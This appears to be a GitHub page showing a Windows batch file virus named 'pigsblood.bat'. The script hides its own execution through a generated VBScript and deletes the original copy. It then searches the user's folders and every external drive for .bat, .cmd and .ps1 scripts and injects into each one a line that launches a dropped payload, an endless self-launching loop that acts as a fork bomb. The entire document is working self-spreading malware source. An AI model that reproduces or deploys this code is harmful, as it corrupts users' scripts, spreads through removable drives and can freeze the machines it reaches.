-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpigsblood.bat
123 lines (99 loc) · 2.73 KB
/
pigsblood.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
@echo off
REM #BEatngU
REM Sabre is hungry...
copy /Y "%0" "%temp%\pi9zbl00d.bat"
if not exist "%temp%\init.vbs" (
:: invisible execution
@echo WScript.Sleep 5000>"%temp%\init.vbs"
@echo zexec ^= WScript.Arguments^(0^)>>"%temp%\init.vbs"
@echo Set objShell ^= CreateObject^("WScript.Shell"^)>>"%temp%\init.vbs"
@echo objShell.Run zexec, 0, False>>"%temp%\init.vbs"
cscript "%temp%\init.vbs" "%temp%\pi9zbl00d.bat"
:: melt
del /f /q "%0"
goto :EOF
)
:: setup payload
set "evil=%temp%\slau9hT3r.bat"
call :setup
:: scan for available drives
set "index=%temp%\inf.ini"
setlocal enabledelayedexpansion
For %%A IN (A,B,C,D,E,F,G,H,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
set "drive=%%A"
:: if drive exists...
if exist "!drive!:\" (
:: local disk
if "!drive!:" EQU "%homedrive%" (
For %%B IN (Documents, Downloads, Videos, Music, Desktop, Favorites) do (
set "dir=%%B"
dir /s /b "%userprofile%\!dir!\*.bat">>"%index%"
dir /s /b "%userprofile%\!dir!\*.cmd">>"%index%"
dir /s /b "%userprofile%\!dir!\*.ps1">>"%index%"
)
) else (
:: alt external drive
dir /s /b "!drive!:\*.bat">>"%index%"
dir /s /b "!drive!:\*.cmd">>"%index%"
dir /s /b "!drive!:\*.ps1">>"%index%"
)
)
)
:: iterate through index list
For /F "delims=" %%C IN (%index%) DO (
set "file=%%C"
:: avoid script overwrite
>nul find /I "#BEatngU" "!file!" && (
goto :skip
) || (
goto :infect
)
:infect
:: gather file information
For %%i IN (!file!) DO (
set "name=%%~ni"
set "extn=%%~xi"
)
If "!extn!" == ".ps1" (
goto :inf_ps1
) ELSE (
goto :inf_batcmd
)
:inf_ps1
:: clone original script
set "dummy=%temp%\!name!.tmp"
Copy /Y "!file!" "%dummy%" >NUL
:: overwrite
@ECHO Start-Process "%evil%">>"!file!"
:: append original code
For /F "delims=" %%t IN (%dummy%) DO (
set "line=%%t"
echo !line!>>"!file!"
)
del /f /q "%dummy%"
goto :skip
:inf_batcmd
:: clone original script
set "dummy=%temp%\!name!.tmp"
Copy /Y "!file!" "%dummy%" >NUL
::overwrite
@ECHO cmd /c start "" "%evil%"
:: append original code
For /F "delims=" %%g IN (%dummy%) DO (
set "line=%%g"
echo !line!>>"!file!"
)
del /f /q "%dummy%"
:skip
)
:: melt
del /q /f "%0"
:setup
:: stage your payload here
(
@echo rem #BEatngU
@echo :x
@echo start ^%0
@echo goto x
)>"%evil%"
:EOF